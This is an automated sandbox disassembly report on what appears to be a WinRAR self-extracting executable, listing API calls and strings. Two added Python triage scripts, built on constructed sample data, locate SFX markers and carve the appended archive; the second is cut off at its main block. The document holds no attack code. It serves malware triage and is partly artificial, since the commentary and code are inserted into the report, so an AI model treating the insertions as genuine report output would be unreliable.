                                                                                                                      • Part of subcall function 00E4AC16: OleInitialize.OLE32(00000000), ref: 00E4AC2F
                                                                                                                      • Part of subcall function 00E4AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E4AC66
                                                                                                                      • Part of subcall function 00E4AC16: SHGetMalloc.SHELL32(00E78438), ref: 00E4AC70
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E4DF5C
                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E4DF83
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E4DF94
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00E4DFCE
                                                                                                                      • Part of subcall function 00E4DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E4DBF4
                                                                                                                      • Part of subcall function 00E4DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E4DC30
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E4DFD7
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00E8EC90,00000800), ref: 00E4DFF2
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00E8EC90), ref: 00E4DFFE
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00E4E009
                                                                                                                    • _swprintf.LIBCMT ref: 00E4E048
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E4E05A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00E4E061
                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00E4E078
                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00E4E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 00E4E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 00E4E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 00E4E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 00E4E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                                    • API String ID: 3049964643-271953491
                                                                                                                    • Opcode ID: c56a31e642952ec5c85e1a6b0ebf171370f4ae13ce7fd9ae907c3f5ac729e689
                                                                                                                    • Instruction ID: d85a3be16bd07ff48120842e80dc52165ec044be00fdc180c1064d33994d1a20
                                                                                                                    • Opcode Fuzzy Hash: c56a31e642952ec5c85e1a6b0ebf171370f4ae13ce7fd9ae907c3f5ac729e689
                                                                                                                    • Instruction Fuzzy Hash: DC610671A48304AFC320AB76BC49F2B77EDBB45744F00242AF949B2392DAB4D94CC761
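The API and string listing for this function (OpenFileMappingW on winrarsfxmappingfile.tmp, SetEnvironmentVariableW on sfxcmd/sfxpar/sfxname/sfxstime, the STARTDLG dialog, the sfxstime timestamp format) is what a WinRAR self-extracting stub does before it unpacks, which means the behaviour of interest lives in the archive appended after the PE image, not in this stub code. The script below is an added triage aid, not part of the Joe Sandbox report or of the sample: it looks for those marker strings (ASCII and UTF-16LE, since the W APIs take UTF-16), computes where the PE's section data ends (the overlay), and carves the RAR 4/5 archive from that point using the public RAR magic bytes. The PE it parses is a constructed stand-in built in the block; all function names are my own.

```python
"""Triage helper for a WinRAR-SFX-style executable (added example; constructed data only)."""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Strings the report's API/string listing attributes to the SFX stub.
SFX_MARKERS = ["winrarsfxmappingfile.tmp", "STARTDLG", "sfxcmd", "sfxpar", "sfxname", "sfxstime"]

# Public RAR archive magic; RAR4 and RAR5 share the first six bytes.
RAR_PREFIX = b"Rar!\x1a\x07"
RAR4_SIG = RAR_PREFIX + b"\x00"
RAR5_SIG = RAR_PREFIX + b"\x01\x00"


def find_sfx_markers(data: bytes) -> List[str]:
    """Return the SFX marker strings present either as ASCII or as UTF-16LE."""
    return [m for m in SFX_MARKERS
            if m.encode("ascii") in data or m.encode("utf-16-le") in data]


def overlay_offset(data: bytes) -> int:
    """File offset just past the last section's raw data: where appended data (the overlay) starts."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsects = struct.unpack_from("<H", data, e_lfanew + 6)[0]       # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]    # COFF SizeOfOptionalHeader
    sect_table = e_lfanew + 24 + opt_size                          # first IMAGE_SECTION_HEADER
    end = 0
    for i in range(nsects):
        # SizeOfRawData at +16 and PointerToRawData at +20 within the 40-byte section header
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect_table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def find_rar_signature(data: bytes, start: int = 0) -> Optional[Tuple[int, str]]:
    """Locate a RAR4 or RAR5 archive header at or after `start`; returns (offset, version) or None."""
    pos = data.find(RAR_PREFIX, start)
    while pos != -1:
        if data[pos:pos + len(RAR5_SIG)] == RAR5_SIG:
            return pos, "RAR5"
        if data[pos:pos + len(RAR4_SIG)] == RAR4_SIG:
            return pos, "RAR4"
        pos = data.find(RAR_PREFIX, pos + 1)
    return None


@dataclass
class SfxTriage:
    markers: List[str]
    overlay_offset: int
    rar_offset: Optional[int]
    rar_version: Optional[str]
    payload: bytes  # carved archive bytes; empty when no archive was found


def triage_sfx(data: bytes) -> SfxTriage:
    """Identify SFX stub markers and carve the appended archive, preferring the overlay."""
    markers = find_sfx_markers(data)
    ovl = overlay_offset(data)
    hit = find_rar_signature(data, ovl) or find_rar_signature(data)  # overlay first, then anywhere
    if hit is None:
        return SfxTriage(markers, ovl, None, None, b"")
    off, ver = hit
    return SfxTriage(markers, ovl, off, ver, data[off:])


def build_constructed_sample() -> bytes:
    """Constructed stand-in: minimal PE headers, one section holding UTF-16 SFX strings, RAR5 overlay."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)      # i386, one section, no optional header
    sect = bytearray(40)
    sect[:5] = b".text"
    struct.pack_into("<IIII", sect, 8, 0x100, 0x1000, 0x100, 0x200)   # VirtualSize, VA, SizeOfRawData, PointerToRawData
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(sect)).ljust(0x200, b"\0")
    section = b"".join(m.encode("utf-16-le") + b"\0\0" for m in SFX_MARKERS).ljust(0x100, b"\0")
    archive = RAR5_SIG + b"\x00" * 24 + b"constructed archive body, not a real RAR stream"
    return headers + section + archive


if __name__ == "__main__":
    t = triage_sfx(build_constructed_sample())
    print(f"markers={t.markers} overlay=0x{t.overlay_offset:x} archive={t.rar_version} at 0x{t.rar_offset:x}")
```

On a real sample, write `t.payload` to a file and open it with an unarchiver in the sandbox; the SFX stub's own comment/script (the data behind sfxcmd/sfxpar) is what decides which extracted file gets executed, so it is worth reading before running anything.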

                                                                                                                    Control-flow Graph

[Control-flow graph for 00E4A6C2 (interactive rendering omitted; blocks are marked executed / not executed in the original). Basic blocks: e4a6c2 FindResourceW -> e4a6e5 SizeofResource -> e4a6fc LoadResource -> e4a711 LockResource -> e4a722 GlobalAlloc -> e4a73d GlobalLock -> e4a74c call e50320 (CreateStreamOnHGlobal) -> e4a76c call e4a626 (GdipAlloc) -> e4a790 -> e4a79a GdipCreateHBITMAPFromBitmap -> e4a7b3; any failure or completion falls through e4a7c5 GlobalUnlock -> e4a7cc GlobalFree -> e4a7d3 / e4a7db return.]
                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E4B73D,00000066), ref: 00E4A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E4A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E4A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E4A7C6
                                                                                                                      • Part of subcall function 00E4A626: GdipAlloc.GDIPLUS(00000010), ref: 00E4A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E4A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00E4A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: Fjun$PNG
                                                                                                                    • API String ID: 211097158-1136719808
                                                                                                                    • Opcode ID: 1603f1ca4221d2bebb9b23556870b03625dddb5dd48e5205e0d7d0c9df2ac3b4
                                                                                                                    • Instruction ID: 453f16b8621075398d17f6187471999f274d5c0dc37bf4890de93eedbd9413ec
                                                                                                                    • Opcode Fuzzy Hash: 1603f1ca4221d2bebb9b23556870b03625dddb5dd48e5205e0d7d0c9df2ac3b4
                                                                                                                    • Instruction Fuzzy Hash: C4318475541302AFD7209F32FC4CD1BBBB9EF857A4B04152AF805F2660EB71DD489A51

                                                                                                                    Control-flow Graph

[Control-flow graph for 00E3A69B (interactive rendering omitted; blocks are marked executed / not executed in the original). Basic blocks: e3a69b call e4ec50 -> e3a6c1 FindFirstFileW; on failure e3a6d0 call e3bb03 -> e3a6e4 FindFirstFileW (retry) -> e3a6fe GetLastError -> e3a709 / e3a70e / e3a713 error classification -> e3a717 / e3a719; on a subsequent call e3a727 FindNextFileW -> e3a732 GetLastError; success path e3a742 calls e40602, e3c310 and e415da (three times) -> e3a804 return.]
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6C4
                                                                                                                      • Part of subcall function 00E3BB03: _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A6FE
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E3A592,000000FF,?,?), ref: 00E3A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    • Opcode ID: 7ff94456c2c656232a8e5e15024297a6309baaedacfd0387b0e74bc734f2262c
                                                                                                                    • Instruction ID: d45617564fcbb037565c1117f8b33185c08013e4d014eb86e477324fa9044c1e
                                                                                                                    • Opcode Fuzzy Hash: 7ff94456c2c656232a8e5e15024297a6309baaedacfd0387b0e74bc734f2262c
                                                                                                                    • Instruction Fuzzy Hash: A5415B72900515ABCB25DF64DCC8AEABBB8BB49350F1441A6E59EE3200D774AED4CF90
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002,00000000), ref: 00E57E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002,00000000), ref: 00E57E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 00E57E28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 6d5d77448423d7529e7eed775598b5349701586e7ce31a8afee96c9edffe1479
                                                                                                                    • Instruction ID: 9fbe120ffea5a73630bce70f9056265ca2d2e4a0a03ddf904ca48dca20e997be
                                                                                                                    • Opcode Fuzzy Hash: 6d5d77448423d7529e7eed775598b5349701586e7ce31a8afee96c9edffe1479
                                                                                                                    • Instruction Fuzzy Hash: D8E0BF31004244EFCF516F65ED0A94A7F6AEB50386B005858FC55BA172CF75DE69CA90
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 0384d212e54373aa4a62efaf0e66d87846abfb595ef742397b67e159f5fc4079
                                                                                                                    • Instruction ID: 15e796c3779e2a5901e6b45f3d4064697cf479199e84ceab3b8c07ba9dc41e52
                                                                                                                    • Opcode Fuzzy Hash: 0384d212e54373aa4a62efaf0e66d87846abfb595ef742397b67e159f5fc4079
                                                                                                                    • Instruction Fuzzy Hash: 92821C70904345AEDF15DF64C999BFABFB9AF05304F0861B9F849BB142CB715A88CB60
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E4B7E5
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 00E4B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 00E4B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E4B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00E4B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00E4B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E4B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E4B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E635F4), ref: 00E4B9B1
                                                                                                                      • Part of subcall function 00E4D453: _wcschr.LIBVCRUNTIME ref: 00E4D45C
                                                                                                                      • Part of subcall function 00E4D453: _wcslen.LIBCMT ref: 00E4D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 00E4B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BA24
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                      • Part of subcall function 00E4D4D4: GetDlgItem.USER32(00000068,00E8FCB8), ref: 00E4D4E8
                                                                                                                      • Part of subcall function 00E4D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00E4AF07,00000001,?,?,00E4B7B9,00E6506C,00E8FCB8,00E8FCB8,00001000,00000000,00000000), ref: 00E4D510
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E4D51B
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E635F4), ref: 00E4D529
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D53F
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E4D559
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D59D
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E4D5AB
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E4D5BA
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E4D5E1
                                                                                                                      • Part of subcall function 00E4D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E643F4), ref: 00E4D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E4BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00E4BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 00E4BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 00E4BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00E4BB43
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00E4BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E4BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00E4BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00E4BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00E4BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00E4BCE2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E4BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,00E635F4), ref: 00E4BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00E4BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E4BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4BE68
                                                                                                                    • _wcslen.LIBCMT ref: 00E4BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 00E4BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E4BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00E4BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E4BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E4BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E4BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,00E7A472), ref: 00E4BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E4C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00E4C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00E4C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E4C1D9
                                                                                                                      • Part of subcall function 00E4C73F: __EH_prolog.LIBCMT ref: 00E4C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E4C1FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<$STARTDLG$^$__tmp_rar_sfx_access_check_%u$h$winrarsfxmappingfile.tmp$Q
                                                                                                                    • API String ID: 3829768659-4153176784
                                                                                                                    • Opcode ID: be2f9ccb0b45789bbdef90d0d99649f8a1bae9c6789f4d389fa7c992c06b6fc6
                                                                                                                    • Instruction ID: 015dfd9edd3ab2fa1af22d49f009f01692a09aeda8344db70aa54925d99b57c2
                                                                                                                    • Opcode Fuzzy Hash: be2f9ccb0b45789bbdef90d0d99649f8a1bae9c6789f4d389fa7c992c06b6fc6
                                                                                                                    • Instruction Fuzzy Hash: 9E421A71985344BEEB21DB71AC4EFBE7BBC9B01704F101056F648B61E2DBB49A48CB21
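Added triage example, not code from the Joe Sandbox report or from WinRAR: the function above carries the characteristic WinRAR SFX stub strings listed in its String ID field (winrarsfxmappingfile.tmp, __tmp_rar_sfx_access_check_%u, the LICENSEDLG and STARTDLG dialog names, and the "-el -s2 "-d%s" "-sp%s"" command-line template that sits next to the CreateFileMappingW / ShellExecuteExW calls). The script below extracts ASCII and UTF-16LE strings from a memory dump or PE file and scores it against those markers, so an analyst can confirm that the outer layer is a stock SFX wrapper before spending time reversing it. The marker list is taken from the report; the score threshold, the helper names and the sample buffers are assumptions constructed for this example.

```python
"""Triage helper: spot a WinRAR SFX stub from the strings the report lists.

Added example, not code from the Joe Sandbox report or from WinRAR. The
marker strings come from the report's String ID field for the function at
00E4B7E5; the threshold, helper names and sample buffers are assumptions
constructed for this example.
"""
import re
import sys
from typing import Dict, List

# Markers from the report's String ID field (function at 00E4B7E5).
SFX_MARKERS: List[str] = [
    "winrarsfxmappingfile.tmp",          # CreateFileMappingW object name
    "__tmp_rar_sfx_access_check_%u",     # temp-file name template
    '-el -s2 "-d%s" "-sp%s"',            # command-line template near ShellExecuteExW
    "LICENSEDLG",                        # DialogBoxParamW resource name
    "STARTDLG",
]

# Assumed threshold: three independent markers is enough to call it an SFX stub.
SCORE_THRESHOLD = 3


def find_wide_strings(data: bytes, min_len: int = 6) -> List[str]:
    """Printable UTF-16LE runs. The stub calls the W-suffixed APIs, so its
    names and format strings are stored as wide characters."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pat.finditer(data)]


def find_ascii_strings(data: bytes, min_len: int = 6) -> List[str]:
    """Printable ASCII runs, for markers that may be stored narrow."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def sfx_marker_hits(data: bytes) -> Dict[str, bool]:
    """Which of the SFX markers occur (as substrings) in any extracted string."""
    strings = find_wide_strings(data) + find_ascii_strings(data)
    return {m: any(m in s for s in strings) for m in SFX_MARKERS}


def classify(data: bytes, threshold: int = SCORE_THRESHOLD) -> str:
    """Verdict string; a single marker alone is not enough (threshold is an assumption)."""
    hits = sfx_marker_hits(data)
    return "winrar-sfx-stub" if sum(hits.values()) >= threshold else "no-sfx-markers"


def _constructed_sample(strings: List[str]) -> bytes:
    """Constructed stand-in for a memory dump: the given strings as
    NUL-terminated UTF-16LE, separated by filler bytes. Not real sample data."""
    buf = bytearray(b"MZ\x90\x00" + b"\xcc" * 17)
    for s in strings:
        buf += s.encode("utf-16-le") + b"\x00\x00" + b"\x90" * 8
    return bytes(buf)


SAMPLE_SFX = _constructed_sample(SFX_MARKERS)                      # constructed positive
SAMPLE_OTHER = _constructed_sample(["Hello World", "GetProcAddress"])  # constructed negative


if __name__ == "__main__":
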